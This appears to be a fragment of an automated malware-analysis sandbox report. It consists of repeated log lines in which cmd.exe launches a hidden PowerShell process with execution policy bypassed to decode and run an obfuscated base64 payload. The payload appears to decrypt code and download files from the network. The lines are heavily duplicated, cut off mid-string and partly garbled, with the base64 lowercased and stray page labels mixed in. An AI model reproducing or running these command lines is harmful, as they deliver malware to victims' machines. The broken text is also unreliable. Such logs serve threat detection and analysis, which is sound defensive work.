a3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdb
i5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdb
i5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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 to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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 to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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 to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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 to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdb
i5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksgJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdb
i5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcr3b3jidcwgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkzndkbnauq29wevrvkcrobmn1ysk7csrmd2rucc5eaxnwb3nlkck7csr3b3jidc5eaxnwb3nlkck7csrobmn1ys5eaxnwb3nlkck7csrobmn1ys5ub0fycmf5kck7fwz1bmn0aw9uigdtdm1ykcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr2chh2at1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgfibmt0psr2chh2as5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrhym5rdc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jg9udca9icrlbny6vvnfuk5btuu7jg5zb3rnid0gj0m6xfvzzxjzxccgkyakb250icsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakbnnvdgc7jg5rawt4pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibsbhf1dcgkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnnwddowlvtupxt2i1n0x3sevha3b3wmhttlzwn0zmdzhpnxjxtgj4melxwt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnl0lvrjexnmj2nup6mhvfsgz0q2zmut09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbibwb2n4ysgkcgfyyw1fdmfykxsjsuvyicckd29yynq9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckag5jdwe9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrmd2rucd1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdb
